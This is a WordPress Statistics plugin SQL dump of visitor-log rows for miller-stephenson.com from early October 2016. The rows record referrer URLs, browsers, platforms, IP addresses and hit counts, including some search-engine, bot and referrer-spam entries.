INSERT INTO `wp_statistics_visitor` VALUES (522, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '107.77.104.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (523, '2016-10-05', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '99.42.98.112', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (524, '2016-10-05', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '88.7.204.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (525, '2016-10-05', 'https://www.google.ca/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwitwP_zvcTPAhXH7D4KHRgxAwYQFggUMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '8.0', '', '166.20.224.12', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (526, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi-26aCvsTPAhWKpR4KHVCeC9kQFggrMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-222N%2C%2520222T.pdf&usg=AFQjCNFZCZI5wPs-cCRMQ4pGlbR-8wR9Tw&sig2=RcESmdvqY3rN6VsTB59ShQ', 'MSIE', 'Windows', '11.0', '', '206.186.133.226', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (527, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (528, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '107.77.94.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (529, '2016-10-05', 'https://www.bing.com/search?q=miller+stephenson+epoxy+907&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '131.225.95.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (530, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (531, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (532, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '167.96.106.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (533, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.43.87.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (534, '2016-10-05', 'https://www.bing.com/search?q=Heloxy%2048&qs=n&form=QBRE&pq=heloxy%2048&sc=3-9&sp=-1&sk=&cvid=0E9CAC6FC61E4C799CDED903CECC654F', 'MSIE', 'Windows', '11.0', '', '198.57.14.68', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (535, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.150.218.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (536, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '166.137.8.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (537, '2016-10-05', 'https://www.valveindustrybuyersguide.com/Category/504/1/Cleaners-Lubricants-Maintenance-Products', 'MSIE', 'Windows', '5.0', '', '41.68.114.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (538, '2016-10-05', 'https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/', 'MSIE', 'Windows', '11.0', '', '170.225.31.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (539, '2016-10-05', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '107.216.216.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (540, '2016-10-05', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '98.237.152.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (541, '2016-10-05', 'https://localhost:5272/067R154L115A10020140825.xhtml', 'SynHttpClient-Built', 'Unknown', '5858', '', '67.154.115.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (542, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.103', '', '64.62.210.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (543, '2016-10-05', 'https://doxyporno.com/', 'MSIE', 'Windows', '4.01', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (544, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.92.244.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (545, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj_7p6czMTPAhWJzIMKHQO1DbYQFggnMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FHeloxy.pdf&usg=AFQjCNEqJwggoJGvKB1ZOMq8A9m4dLsWyw&bvm=bv.134495766,d.amc', 'MSIE', 'Windows', '11.0', '', '74.142.122.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (546, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.151.77.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (547, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.250.251.93', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (548, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.26.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (549, '2016-10-05', 'https://www.bing.com/search?q=miller+stephenson&PC=SMSM&FORM=MBDPSB', 'Android Browser', 'Android', '4.0', '', '174.199.26.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (550, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '216.75.124.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (551, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (552, '2016-10-05', 'https://www.dogpile.com/search/web?fcoid=417&fcop=topnav&fpid=2&q=EP0N828&ql=', 'Chrome', 'Windows', '53.0.2785.143', '', '70.89.15.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (553, '2016-10-05', 'https://www.bing.com/search?q=miller+stephenson&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '63.96.200.73', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (554, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '142.240.200.10', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (555, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '151.199.190.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (556, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.200.152.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (557, '2016-10-05', 'https://www.google.ca/', 'Safari', 'Macintosh', '9.1.3', '', '192.197.128.13', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (558, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '79.209.240.207', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (559, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.172.1.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (560, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.130.81.162', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (561, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.132', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (562, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.30.84.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (563, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.160.48.113', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (564, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.206.119.243', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (565, '2016-10-05', 'https://www.miller-stephenson.com/products/connector_lubricants.aspx', 'Chrome', 'Windows', '21.0.1180.89', '', '101.226.168.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (566, '2016-10-05', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '47.138.212.52', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (567, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (568, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjlp5nO3sTPAhWGbj4KHftrCgEQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-470C%2C%2520472C.pdf&usg=AFQjCNE-rTjqf-NwlbstznXUqBEMVUWwwQ&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '68.98.204.141', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (569, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (570, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '107.184.210.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (571, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '68.150.9.66', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (572, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.198.53.96', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (573, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (574, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '199.96.227.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (575, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (576, '2016-10-05', 'https://www.miller-stephenson.com', 'woobot', 'Unknown', '2.0', '', '54.173.113.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (577, '2016-10-05', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPhone', '420', '', '54.152.77.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (578, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '54.152.77.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (579, '2016-10-05', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPad', '420', '', '54.85.198.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (580, '2016-10-05', 'https://www.miller-stephenson.com', 'woobot', 'Unknown', '2.0', '', '52.5.69.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (581, '2016-10-05', 'https://www.miller-stephenson.com', 'woobot', 'Unknown', '2.0', '', '54.85.198.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (582, '2016-10-05', 'https://www.miller-stephenson.com', 'woobot', 'Unknown', '2.0', '', '52.5.133.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (583, '2016-10-05', 'https://www.miller-stephenson.com', 'W3C', 'Unknown', 'Unknown', '', '52.5.69.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (584, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '75.126.91.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (585, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '54.85.198.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (586, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '5.135.138.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (587, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '109.69.218.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (588, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '37.35.105.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (589, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '192.99.63.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (590, '2016-10-05', 'https://www.miller-stephenson.com', 'internetVista', 'Unknown', 'Unknown', '', '78.46.102.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (591, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '5.0.4', '', '64.74.215.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (592, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '5.0.4', '', '64.74.215.90', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (593, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (594, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (595, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (596, '2016-10-05', 'https://www.miller-stephenson.com', 'GC3pro', 'Unknown', 'Unknown', '', '198.199.106.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (597, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '11.0', '', '70.32.40.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (598, '2016-10-05', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjGrsyC68TPAhXJG4EKHXZKAcUYABAE&sig=AOD64_39dXXwTbjjpLqUE4kKTPLFIzuliQ&ctype=4&rct=j&q=&ved=0ahUKEwiZscmC68TPAhVTgiYKHfdWDaEQwgUIJCgD&adurl=', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (599, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '5.0', '', '104.236.122.37', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (600, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.236.122.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (601, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.102.225.32', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (602, '2016-10-05', 'https://www.miller-stephenson.com/contact/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (603, '2016-10-05', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '189.176.211.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (604, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.191.95.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (605, '2016-10-05', 'https://forums.iboats.com/forum/engine-repair-and-maintenance/mercruiser-i-o-inboard-engines-outdrives/398994-limits-of-jb-weld-block-repairs', 'MSIE', 'Windows', '11.0', '', '108.91.88.248', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (606, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '24.155.56.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (607, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '44.0', '', '192.146.217.50', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (608, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/', 'Firefox', 'Windows', '44.0', '', '192.146.217.50', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (609, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (610, '2016-10-06', 'https://yourdesires.ru/', 'MSIE', 'Windows', '6.0', '', '46.211.197.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (611, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.208.177.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (612, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '97.35.3.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (613, '2016-10-06', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '149.202.38.124', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (614, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '71.94.234.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (615, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.200.110.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (616, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.99.148.215', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (617, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.129.148.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (618, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '72.209.39.24', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (619, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (620, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (621, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (622, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (623, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '69.151.127.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (624, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '79.209.240.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (625, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '153.156.252.52', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (626, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '169.236.86.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (627, '2016-10-06', 'https://storehouse.ua/', 'MSIE', 'Windows', '6.0', '', '178.137.82.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (628, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=3&ved=0ahUKEwjB5OfU_sTPAhUF_IMKHatABqoQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-242N%2C%2520242N-AS.pdf&usg=AFQjCNGshRLTaPwPGah1Py7rWJa5tteBAQ&bvm=bv.134495766,d.amc', 'MSIE', 'Windows', '10.0', '', '128.26.73.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (629, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '208.115.153.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (630, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '68.1.61.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (631, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (632, '2016-10-06', 'https://www.bing.com/search?q=release+agent&src=IE-SearchBox&first=8&FORM=PERE', 'MSIE', 'Windows', '11.0', '', '50.244.241.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (633, '2016-10-06', 'https://www.bing.com/search?q=MILLER+STEPHENSON&qs=n&form=QBRE&pq=miller+stephenson&sc=8-14&sp=-1&sk=&cvid=27FD4804441C40FEA88D583DA99C0BEF', 'MSIE', 'Windows', '11.0', '', '153.156.73.13', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (634, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.154.250.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (635, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '173.88.169.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (636, '2016-10-06', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (637, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (638, '2016-10-06', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '9.20', '', '107.170.107.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (639, '2016-10-06', 'https://www.google.co.kr/', 'Safari', 'iPhone', '10.0', '', '117.111.14.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (640, '2016-10-06', 'https://www.miller-stephenson.com/product/krytox-gpl-205/', 'Safari', 'iPhone', '10.0', '', '59.22.100.1', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (641, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj8wu-kisXPAhWMNT4KHeG2CgYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '164.49.251.71', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (642, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (643, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (644, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '111.221.31.1', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (645, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '60.214.218.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (646, '2016-10-06', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '58.9.217.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (647, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '223.247.182.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (648, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (649, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (650, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.82.35.236', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (651, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '112.198.243.181', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (652, '2016-10-06', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '122.154.61.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (653, '2016-10-06', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '14.221.4.16', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (654, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '106.186.208.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (655, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '47.34.202.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (656, '2016-10-06', 'https://www.google.com.hk/', 'Chrome', 'Windows', '45.0.2454.101', '', '120.239.139.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (657, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.64.7.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (658, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '52.90.111.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (659, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '16.0.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (660, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (661, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '189.89.125.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (662, '2016-10-06', 'https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=7&ved=0ahUKEwi7-KTYocXPAhUH92MKHUJKBU8QFghAMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ', 'MSIE', 'Windows', '10.0', '', '203.77.177.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (663, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (664, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '48.0', '', '45.35.63.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (665, '2016-10-06', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Windows', '534', '', '131.253.27.62', '000', 1, 0); 
